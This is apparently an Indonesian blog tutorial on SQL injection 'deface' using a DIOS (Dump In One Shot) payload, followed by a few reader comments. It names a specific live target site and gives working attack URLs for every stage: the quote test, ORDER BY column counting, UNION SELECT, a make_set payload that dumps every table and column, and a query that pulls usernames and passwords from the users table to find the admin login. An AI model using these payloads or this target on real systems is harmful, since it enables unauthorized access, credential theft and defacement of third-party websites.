Ok, setelah saya memberikan daftar Dork Fresh SQLi 2019, sekarang giliran kita akan mempraktekannya.
Apa itu SQLi?
SQLi adalah singkatan dari Stuctured Query Language Injection. Kegiatan SQLi ini memungkinkan para attacker untuk melihat table dan database pada suatu website.
Kegiatan ini terbilang cukup mudah, karena cuma tempel tempel dios saja. Dios adalah Dump In One Shot. Dengan "dios" inilah kamu dapat melihat column dan tablenya.
Mumpung disini saya udah mendapatkan website vuln SQLi - nya, kita akan coba eksekusi.
Live Target = http://iagcc.com/news.php?id=58
Cara Deface SQLi dengan Dios (Dump In One Shot)
1. Oke, langkah pertama kalian dorking sendiri, dengan dork yang sudah saya berikan dipostingan sebelumnya atau dengan live target diatas.
2. Untuk Menentukan vuln atau tidaknya, cukup kamu beri string atau quote (')
Contoh : http://iagcc.com/news.php?id=58'
3. Jika vuln web yang tadi kamu beri string akan muncul kata kata "You Have error an SQL bla.. bla.. bla.." entah apalah itu saya tidak hafal h3h3 :v
4. Lanjut kita bermain order by sampai eror.
Contoh :
http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4--(Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)
5. Karena errornya pada angka 7, maka columnya ada 6.
6. Sekarang kita kasih union select sesuai column
Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--
Jangan lupa beri tanda (-) sebelum parameter GET (liat sebelum angka 58)
7. Setelah itu akan muncul angka ajaibnya. Pada web tadi angka ajaibnya ada pada angka 4. Karena angka ajaib ada di angka 4, maka kita akan masukkan diosnya.
Dios :
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--
8. Maka akan muncul semua column dan tablenya. Liat gambar :
9. Selanjutnya tinggal kita dump yang column nya yang sekiranya berbau admin,users,dll seperti gambar diatas yang saya beri tanda panah.
10. Jadi, ngedump username dan passwordnya seperti ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--11. Nah, sudah ketemu nih username dan passwordnya tinggal hash dan cari admin loginnya.
Gambar :
oke, demikian dulu pembahasan SQLi dengan dios. Semoga bermanfaat dan gunakan dengan bijak. Thank's.
Mantap, walaupun masih bingung, h3h3
BalasHapusIya, hehe
HapusAda wa nggak bang? Aku mau belajar nih
BalasHapusHubungi kami pada contact blog ini, pada menu navbar. Ntar saya respon ☺
Hapus